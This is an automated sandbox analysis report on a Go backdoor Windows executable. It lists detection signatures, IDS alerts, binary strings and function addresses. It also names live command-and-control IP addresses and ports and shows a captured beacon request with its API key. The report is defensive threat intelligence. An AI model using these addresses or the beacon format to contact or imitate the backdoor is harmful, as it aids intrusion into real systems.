Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
m0Yc9KltGw.exe

Overview

General Information

Sample name:m0Yc9KltGw.exe
renamed because original name is a hash value
Original sample name:63b7bb26a60fb9e73c0e1427a4fcfaf2.exe
Analysis ID:1550358
MD5:63b7bb26a60fb9e73c0e1427a4fcfaf2
SHA1:83b9ac53d958a36dd340f93d08615f452584cf17
SHA256:e78fc7300dea3f82b9fb7130621e27f5459d4a521243fd42033f6f010f2995e2
Tags:exeuser-abuse_ch
Infos:

Detection

GO Backdoor
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Found Tor onion address
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • m0Yc9KltGw.exe (PID: 1984 cmdline: "C:\Users\user\Desktop\m0Yc9KltGw.exe" MD5: 63B7BB26A60FB9E73C0E1427A4FCFAF2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2733958560.000000000C008000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
    Process Memory Space: m0Yc9KltGw.exe PID: 1984JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-06T17:18:58.773033+010020229301A Network Trojan was detected172.202.163.200443192.168.2.849709TCP
      2024-11-06T17:19:37.328755+010020229301A Network Trojan was detected172.202.163.200443192.168.2.849719TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-06T17:19:22.896893+010028555361A Network Trojan was detected192.168.2.849718185.121.233.15225139TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-06T17:19:52.178566+010028555371A Network Trojan was detected192.168.2.849718185.121.233.15225139TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-06T17:19:52.412438+010028555381A Network Trojan was detected185.121.233.15225139192.168.2.849718TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-06T17:19:22.896584+010028555391A Network Trojan was detected185.121.233.15225139192.168.2.849718TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: m0Yc9KltGw.exeReversingLabs: Detection: 45%
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
      Source: m0Yc9KltGw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: m0Yc9KltGw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 4x nop then mov dword ptr [esp], edx0_2_031BD130
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 4x nop then shr ecx, 0Dh0_2_031C84C0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 4x nop then shr ebp, 0Dh0_2_031C7A50

      Networking

      barindex
      Suricata IDS alerts for network traffic
      Source: Network trafficSuricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 185.121.233.152:25139 -> 192.168.2.8:49718
      Source: Network trafficSuricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.8:49718 -> 185.121.233.152:25139
      Source: Network trafficSuricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.8:49718 -> 185.121.233.152:25139
      Source: Network trafficSuricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 185.121.233.152:25139 -> 192.168.2.8:49718
      Connects to many ports of the same IP (likely port scanning)
      Source: global trafficTCP traffic: 185.121.233.152 ports 25139,1,2,3,5,9
      Found Tor onion address
      Source: m0Yc9KltGw.exe, 00000000.00000002.2729788978.00000000031A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp2server
      Source: m0Yc9KltGw.exe, 00000000.00000002.2726997183.0000000002A50000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp2server
      Source: global trafficTCP traffic: 192.168.2.8:49718 -> 185.121.233.152:25139
      Source: Joe Sandbox ViewIP Address: 46.8.232.106 46.8.232.106
      Source: Joe Sandbox ViewIP Address: 93.185.159.253 93.185.159.253
      Source: Joe Sandbox ViewASN Name: IPCORE-ASES IPCORE-ASES
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49709
      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.8:49719
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
      Source: unknownTCP traffic detected without corresponding DNS query: 185.121.233.152
      Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
      Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 46.8.232.106User-Agent: Go-http-client/1.1Content-Length: 198X-Api-Key: roePuyRbAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 04 27 19 07 0c 0d 21 01 2d 0d 1b 00 16 01 3a 10 5f 24 0f 0e 3d 52 2e 09 31 28 21 08 27 3f 01 07 3c 15 1a 06 1b 3a 3e 12 2b 26 0f 5d 0a 03 27 57 3b 02 1b 56 25 50 00 58 2d 31 22 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 21 39 3a 35 06 53 37 19 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 0a 26 3f 05 3e 0c 24 3d 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 0c 1e 3e 48 27 00 19 5c 08 51 5d 45 4f 4d 03 02 5c 45 59 4d 58 55 0b 50 01 0d 5c 50 08 51 53 09 0c 5f 0c 50 50 0c 5e 03 58 53 51 58 0f 52 0f 04 05 0e 08 54 4b 1a Data Ascii: M*L\K'!-:_$=R.1(!'?<:>+&]'W;V%PX-1"EOM:DSE!9:5S7LJK9AUL&?>$=EOM9L\KW>H'\Q]EOM\EYMXUP\PQS_PP^XSQXRTK
      Source: m0Yc9KltGw.exe, 00000000.00000002.2735492505.000000000C1A8000.00000004.00001000.00020000.00000000.sdmp, m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243
      Source: m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C12A000.00000004.00001000.00020000.00000000.sdmp, m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243http://46.8.232.106
      Source: m0Yc9KltGw.exe, 00000000.00000002.2735492505.000000000C1A8000.00000004.00001000.00020000.00000000.sdmp, m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106
      Source: m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61
      Source: m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91
      Source: m0Yc9KltGw.exe, 00000000.00000002.2735266794.000000000C128000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://93.185.159.253
      Source: m0Yc9KltGw.exeString found in binary or memory: http://www.innosetup.com/
      Source: m0Yc9KltGw.exeString found in binary or memory: http://www.remobjects.com/ps
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031E0060 SetWaitableTimer,NtWaitForSingleObject,0_2_031E0060
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031FC7B0 NtWaitForSingleObject,0_2_031FC7B0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031D6B90 SetWaitableTimer,NtWaitForSingleObject,0_2_031D6B90
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031D6E00 SetWaitableTimer,NtWaitForSingleObject,0_2_031D6E00
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031D6D30 SetWaitableTimer,NtWaitForSingleObject,0_2_031D6D30
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031CEC30 LoadLibraryExW,RtlAddVectoredContinueHandler,LoadLibraryExW,LoadLibraryExW,NtWaitForSingleObject,RtlGetCurrentPeb,RtlGetNtVersionNumbers,LoadLibraryExW,timeBeginPeriod,timeEndPeriod,timeBeginPeriod,LoadLibraryExW,WSAGetOverlappedResult,0_2_031CEC30
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031D6C60 SetWaitableTimer,NtWaitForSingleObject,0_2_031D6C60
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_00414073 NtQueryDefaultLocale,0_2_00414073
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_00415683 NtQueryDefaultLocale,0_2_00415683
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_00415176 NtQueryDefaultLocale,0_2_00415176
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0041511D NtQueryDefaultLocale,0_2_0041511D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_00415218 NtQueryDefaultLocale,0_2_00415218
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_00414293 NtQueryDefaultLocale,0_2_00414293
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0041388D NtQueryDefaultLocale,0_2_0041388D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0041593F NtQueryDefaultLocale,0_2_0041593F
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_004149A2 NtQueryDefaultLocale,0_2_004149A2
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_00414B29 NtQueryDefaultLocale,0_2_00414B29
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_00414BC4 NtQueryDefaultLocale,0_2_00414BC4
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_00414BD3 NtQueryDefaultLocale,0_2_00414BD3
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_00413CD3 NtQueryDefaultLocale,0_2_00413CD3
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0320C3300_2_0320C330
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031C93D00_2_031C93D0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_032173C00_2_032173C0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0321B3D00_2_0321B3D0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031CA2000_2_031CA200
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031AB2500_2_031AB250
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0320D2A00_2_0320D2A0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_032202800_2_03220280
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031D41000_2_031D4100
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0321C1800_2_0321C180
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031EB1F00_2_031EB1F0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031FA0120_2_031FA012
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031EF0000_2_031EF000
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0321C7100_2_0321C710
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031AA6A00_2_031AA6A0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031C55400_2_031C5540
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_032185800_2_03218580
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0322E5900_2_0322E590
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_032094000_2_03209400
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031B1B700_2_031B1B70
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031CABB00_2_031CABB0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031B3BE00_2_031B3BE0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031A7A300_2_031A7A30
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031CA8600_2_031CA860
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_03217F900_2_03217F90
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031AFFE00_2_031AFFE0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_03220E000_2_03220E00
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031C8E400_2_031C8E40
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031E9E400_2_031E9E40
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031E5E900_2_031E5E90
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031DAEC00_2_031DAEC0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0321BD100_2_0321BD10
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031B8DD00_2_031B8DD0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0321FC700_2_0321FC70
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0321CC400_2_0321CC40
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031C9C900_2_031C9C90
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_031C0CA00_2_031C0CA0
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0041CE790_2_0041CE79
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0040B0DC0_2_0040B0DC
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0040C1C80_2_0040C1C8
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0041C24C0_2_0041C24C
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0041D4EC0_2_0041D4EC
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_004055490_2_00405549
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0041C5B50_2_0041C5B5
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_004135BD0_2_004135BD
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0041C71E0_2_0041C71E
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0040A92C0_2_0040A92C
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_004149A20_2_004149A2
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0041DB630_2_0041DB63
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_00414B290_2_00414B29
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_00414BC40_2_00414BC4
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_00414BD30_2_00414BD3
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02923DC40_2_02923DC4
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02926A920_2_02926A92
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029272900_2_02927290
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292628B0_2_0292628B
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029262A60_2_029262A6
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029272DD0_2_029272DD
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029262F80_2_029262F8
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029242010_2_02924201
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02923A080_2_02923A08
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925A210_2_02925A21
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292722C0_2_0292722C
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029272500_2_02927250
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029282410_2_02928241
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292727D0_2_0292727D
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292726B0_2_0292726B
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029263BA0_2_029263BA
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029233BB0_2_029233BB
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02925BA90_2_02925BA9
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02923BAD0_2_02923BAD
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_02923BD10_2_02923BD1
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_029263060_2_02926306
      Source: C:\Users\user\Desktop\m0Yc9KltGw.exeCode function: 0_2_0292730F0_2_0292730F
